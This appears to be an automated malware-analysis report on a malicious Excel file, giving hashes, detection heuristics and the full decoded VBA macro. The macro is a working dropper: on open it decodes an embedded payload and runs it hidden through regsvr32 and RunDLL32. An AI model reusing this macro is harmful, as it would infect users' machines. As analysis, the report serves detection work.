Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 981c5d0c40862929…

MALICIOUS

Office (OLE) / .XLS

76.5 KB Created: 2025-07-21 14:34:34 Authoring application: Microsoft Excel First seen: 2026-06-21
MD5: c347425dd7930e4008b77bc80fd204b3 SHA-1: 3abdb8273ef2f5f161aea9d9b1fbbbbed697f2b1 SHA-256: 981c5d0c4086292903c9f27312c0c446a0d0599010a776839098c57337846d8d
258 Risk Score

Heuristics 8

  • XOR-encoded strings (key 0x4A) critical SC_XOR_ENCODED
    Found 2 Windows library/API name(s) XOR-encoded with single-byte key 0x4A: 'kernel32.dll', 'VirtualProtect'
    Disassembly
    x86 disassembly · validity: uncertain (0.553) — 1/1 branch targets land on an instruction boundary (100% coherence)
    0000B28F  212f              and dword ptr [edi], ebp
    0000B291  38242f            cmp byte ptr [edi + ebp], ah
    0000B294  267978            jns 0xb30f
    0000B297  642e26264a        dec edx
    0000B29C  03242c            add esp, dword ptr [esp + ebp]
    0000B29F  251f3a2625        and eax, 0x25263a1f
    0000B2A4  2b2e              sub ebp, dword ptr [esi]
    0000B2A6  2f                das
    0000B2A7  38642e26          cmp byte ptr [esi + ebp + 0x26], ah
    0000B2AB  264a              dec edx
    0000B2AD  392f              cmp dword ptr [edi], ebp
    0000B2AF  3e15192f293f      adc eax, 0x3f292f19
    0000B2B5  3823              cmp byte ptr [ebx], ah
    0000B2B7  3e331a            xor ebx, dword ptr ds:[edx]
    0000B2BA  38253e252925      cmp byte ptr [0x2529253e], ah
    0000B2C0  264a              dec edx
    0000B2C2  0d2f3e182f        or eax, 0x2f183e2f
    0000B2C7  393a              cmp dword ptr [edx], edi
    0000B2C9  2524392f19        and eax, 0x192f3924
    0000B2CE  3e382f            cmp byte ptr ds:[edi], ch
    0000B2D1  2b27              sub esp, dword ptr [edi]
    0000B2D3  4a                dec edx
    0000B2D4  07                pop es
    0000B2D5  2f                das
    0000B2D6  27                daa
    0000B2D7  253833193e        and eax, 0x3e193338
    0000B2DC  382f              cmp byte ptr [edi], ch
    0000B2DE  2b27              sub esp, dword ptr [edi]
    0000B2E0  4a                dec edx
    0000B2E1  2d2f3e1503        sub eax, 0x3153e2f
    0000B2E6  3e2f              das
    0000B2E8  27                daa
    0000B2E9  4a                dec edx
    0000B2EA  053a2f382b        add eax, 0x2b382f3a
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
            Shell "RunDLL32.EXE shell32.dll,ShellExec_RunDLL " & Chr(34) & n4lpppiDcX08yM & d1C6kWo5qGIcZ & Chr(34), 0
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
    LOLBin reference in VBA
    Matched line in script
            sl88rbqsvJ4.TargetPath = "C:\Windows\System32\regsvr32.exe"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set bhJpP = CreateObject("new:{0D43FE01-F093-11CF-8940-00A0C9054228}")
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        hMZRAtjSR = Environ("LOCALAPPDATA") & "\Serv"
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4561 bytes
SHA-256: 63eb849d8cb3c752479d2e21bd0fb702cf2604c3f6ff1bc669e20f8ac5bced80
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function BnitWDvCj() As String
    Dim hMZRAtjSR As String
    Dim bhJpP As Object
    
    hMZRAtjSR = Environ("LOCALAPPDATA") & "\Serv"
    Set bhJpP = CreateObject("new:{0D43FE01-F093-11CF-8940-00A0C9054228}")

    If Not bhJpP.FolderExists(hMZRAtjSR) Then
        bhJpP.CreateFolder (hMZRAtjSR)
    Else
    End If

    BnitWDvCj = hMZRAtjSR
End Function

Function cWnFD5ECd8Gw9b(ThGHAhmxQ() As Byte, yrZxqN3O As Byte) As Byte()
    Dim MIoNQFixNBXX As Long
    Dim LkTacRo5NzGc() As Byte
    
    
    ReDim LkTacRo5NzGc(LBound(ThGHAhmxQ) To UBound(ThGHAhmxQ))
    
    For MIoNQFixNBXX = LBound(ThGHAhmxQ) To UBound(ThGHAhmxQ)
        LkTacRo5NzGc(MIoNQFixNBXX) = ThGHAhmxQ(MIoNQFixNBXX) Xor yrZxqN3O
    Next MIoNQFixNBXX
    
    cWnFD5ECd8Gw9b = LkTacRo5NzGc
End Function


Function gPfWuMRpyskE(fileName As String)
    Dim hjadgqwdbku As String
    Dim gsdfsdf As Byte
    Dim asdasdascasc() As Byte
    Dim kjhjtyjvbnnfd() As Byte
    Dim fdsjkhfdsjklnfs As Integer
    Dim tyuiojlkh As Long
    
    hjadgqwdbku = fileName
    gsdfsdf = Asc("J")

    
    fdsjkhfdsjklnfs = FreeFile
    Open hjadgqwdbku For Binary Access Read As #fdsjkhfdsjklnfs
    
        tyuiojlkh = LOF(fdsjkhfdsjklnfs)
    
        ReDim asdasdascasc(0 To tyuiojlkh - 1)
        Get #fdsjkhfdsjklnfs, , asdasdascasc
    Close #fdsjkhfdsjklnfs

    
    kjhjtyjvbnnfd = cWnFD5ECd8Gw9b(asdasdascasc, gsdfsdf)

    
    Open hjadgqwdbku For Binary Access Write As #fdsjkhfdsjklnfs
        Put #fdsjkhfdsjklnfs, , kjhjtyjvbnnfd
    Close #fdsjkhfdsjklnfs

End Function

Sub MrAyjD2rl(QRYSKkuXeU As String, SsUI As String)
    Dim bhJpP As Object
    Dim uDO5QeoeYCZ As String
    Dim sVXb2RfN As String
    
    Set bhJpP = CreateObject("Scripting.FileSystemObject")
    
    uDO5QeoeYCZ = Environ("TEMP")
    
    sVXb2RfN = bhJpP.BuildPath(uDO5QeoeYCZ, SsUI)
    
    If bhJpP.FileExists(sVXb2RfN) Then
        bhJpP.CopyFile sVXb2RfN, QRYSKkuXeU
    End If
    
    Set bhJpP = Nothing
End Sub

Sub VhRwO4WtSm()
    Dim uv1YWDCyOnxwN As Object
    Dim s6WjBf8hE As Object
    Dim e6IbjCVf As Object
    Dim nLb39ozpR As String
    Dim ZfUebm89krgz As String

    Dim hMZRAtjSR As String
    Dim GWC05BplCrglUAd As String
    GWC05BplCrglUAd = "0x00bac729fe.log"

    If Dir(hMZRAtjSR & "\0x00bac729fe.log") = "" Then
        
        hMZRAtjSR = BnitWDvCj()
        Call MrAyjD2rl(hMZRAtjSR & "\0x00bac729fe.log", GWC05BplCrglUAd)
        'Call Pc0riX9L1HYlDKY(hMZRAtjSR & "\0x00bac729fe.log", "\0x781da2b1c3")
        'Call i8lh(hMZRAtjSR & "\0x00bac729fe.log", "\0x781da2b1c3")
        gPfWuMRpyskE (hMZRAtjSR & "\0x00bac729fe.log")

        
        Set BDYBXoXN2 = CreateObject("new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B")
        n4lpppiDcX08yM = BDYBXoXN2.ExpandEnvironmentStrings("%appdata%") + "\Microsoft\Windows\"
        d1C6kWo5qGIcZ = "Protection overview.lnk"
        Set sl88rbqsvJ4 = BDYBXoXN2.CreateShortcut(n4lpppiDcX08yM & d1C6kWo5qGIcZ)
        
        sl88rbqsvJ4.TargetPath = "C:\Windows\System32\regsvr32.exe"
        sl88rbqsvJ4.Arguments = " /u /s " & Chr(34) & hMZRAtjSR & "\0x00bac729fe.log" & Chr(34)
        sl88rbqsvJ4.Description = ""
        sl88rbqsvJ4.WindowStyle = "0"
        sl88rbqsvJ4.WorkingDirectory = n4lpppiDcX08yM
        sl88rbqsvJ4.Save
        Set sl88rbqsvJ4 = Nothing
        
        ' execute sl88rbqsvJ4 TitQzflyfw
        Shell "RunDLL32.EXE shell32.dll,ShellExec_RunDLL " & Chr(34) & n4lpppiDcX08yM & d1C6kWo5qGIcZ & Chr(34), 0
        
    End If


End Sub

Sub Workbook_open()
    Dim rSDI94TRmtiDL As OLEObject
    Set rSDI94TRmtiDL = Sheet1.OLEObjects(1)
    rSDI94TRmtiDL.Copy
    Dim TgKXzG3crsgMKgC1 As Object
    Set TgKXzG3crsgMKgC1 = CreateObject("ADODB.Stream")
    TgKXzG3crsgMKgC1.Type = 1
    TgKXzG3crsgMKgC1.Open
    TgKXzG3crsgMKgC1.Close

    VhRwO4WtSm

End Sub
ole10native_00.bin ole-package OLE Ole10Native stream: MBD000064B2/Ole10Native 40278 bytes
SHA-256: 2e6ac7112a6f4a8a3df017e74c7192f3ec6fead38218a092bb405098684f93b3
ole10native_00_0x00bac729fe.log ole-package-payload OLE Ole10Native payload: MBD000064B2/Ole10Native; display_name=0x00bac729fe.log; full_path=C:\Users\user\AppData\Local\Temp\0x00bac729fe.log; temp_path=; def_file= 39936 bytes
SHA-256: 37946cb6ca884e446e897fa4af2de9f765a0835dc203ec04a15dd01add3c6c6f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
380 of 410 identifiers look randomly generated (e.g. 'rJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ') — consistent with name-mangling obfuscation. Carved artifact contains 6 long base64-like blob(s).